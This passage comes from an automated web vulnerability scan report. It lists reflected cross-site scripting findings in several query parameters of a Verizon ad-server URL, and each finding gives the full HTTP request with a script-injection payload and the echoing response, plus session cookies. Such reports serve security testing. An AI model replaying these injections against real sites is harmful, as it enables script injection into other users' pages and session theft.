Content-Length: 1366

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=&34c27"><script>alert(1)</script>d51ff14420e=1" target="_top">
...[SNIP]...

2.543. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [npa parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the npa request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f117a"><script>alert(1)</script>331fdd2fce2 was submitted in the npa parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=f117a"><script>alert(1)</script>331fdd2fce2&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:29 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
racking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=f117a"><script>alert(1)</script>331fdd2fce2&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.544. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [nxx parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the nxx request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8d66a"><script>alert(1)</script>65c9f038e42 was submitted in the nxx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=8d66a"><script>alert(1)</script>65c9f038e42&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:35 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ng/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=8d66a"><script>alert(1)</script>65c9f038e42&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.545. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [online_backup parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the online_backup request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1437a"><script>alert(1)</script>729e84839c0 was submitted in the online_backup parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=1437a"><script>alert(1)</script>729e84839c0&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
e=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=1437a"><script>alert(1)</script>729e84839c0&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.546. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [partner parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the partner request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dce20"><script>alert(1)</script>637502287a6 was submitted in the partner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=dce20"><script>alert(1)</script>637502287a6&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=dce20"><script>alert(1)</script>637502287a6&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search=" target="_top">
...[SNIP]...

2.547. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popcity parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popcity request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5f448"><script>alert(1)</script>6098f5fb0ba was submitted in the popcity parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=5f448"><script>alert(1)</script>6098f5fb0ba&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:22:58 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/277262232/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=5f448"><script>alert(1)</script>6098f5fb0ba&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=
...[SNIP]...

2.548. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popcounty parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popcounty request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad5ca"><script>alert(1)</script>a53a3dbafa9 was submitted in the popcounty parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=ad5ca"><script>alert(1)</script>a53a3dbafa9&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:05 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
nd2.net/homepage/L24/2117446648/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=ad5ca"><script>alert(1)</script>a53a3dbafa9&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&w
...[SNIP]...

2.549. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popdma parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popdma request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1f1a3"><script>alert(1)</script>c890055c1a9 was submitted in the popdma parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1f1a3"><script>alert(1)</script>c890055c1a9&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:07 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
/homepage/L24/367911406/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=1f1a3"><script>alert(1)</script>c890055c1a9&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhostin
...[SNIP]...

2.550. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popindicator parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popindicator request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8468f"><script>alert(1)</script>c908751176e was submitted in the popindicator parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=8468f"><script>alert(1)</script>c908751176e&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:22:56 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1362
Content-Type: text/html
Cache-Control: private
Content-Length: 1362

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ne.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/1560599916/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=&popindicator=8468f"><script>alert(1)</script>c908751176e&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_
...[SNIP]...

2.551. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popip parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popip request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7923d"><script>alert(1)</script>372b127e0e7 was submitted in the popip parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=7923d"><script>alert(1)</script>372b127e0e7&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:22:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
ral.verizononline.com/RealMedia/ads/click_lx.ads/vzsurround2.net/homepage/L24/223961865/Top/VDSL/PlatformA_vzsur_728_2009-05/PlatformA_vzsur_728_2009-05_tracking/726e6f58326b7a6e4b45494141693565?popip=7923d"><script>alert(1)</script>372b127e0e7&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&au
...[SNIP]...

2.552. http://oascentral.verizononline.com/RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top [popservice parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.verizononline.com
Path:   /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top

Issue detail

The value of the popservice request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63b79"><script>alert(1)</script>b916806bab4 was submitted in the popservice parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_sx.ads/vzsurround2.net/homepage/8909@Top?popip=&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=63b79"><script>alert(1)</script>b916806bab4&connex=&prizm=&usertype=consumer&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&audio_conf=&smb_premmail=&pts=&online_backup=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=&search= HTTP/1.1
Host: oascentral.verizononline.com
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/?WT.ti=Central/Header/vzsurround_lnkout9c748%22;alert(1)//a814480360d
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rnoX2kznKEIAAi5e; RMFW=011PJcWI710es7jT|710esTl9; RMFD=011PKCpLO10escOu; NSC_d17efm_qppm_iuuq=ffffffff09499e3a45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 22:23:09 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Cteonnt-Length: 1360
Content-Type: text/html
Cache-Control: private
Content-Length: 1360

<script type='text/javascript'>
var ACE_AR = {site: '737081', size: '728090'};
</script>
<script type='text/javascript' SRC='http://uac.advertising.com/wrapper/aceUAC.js'></script>
<a href="http:/
...[SNIP]...
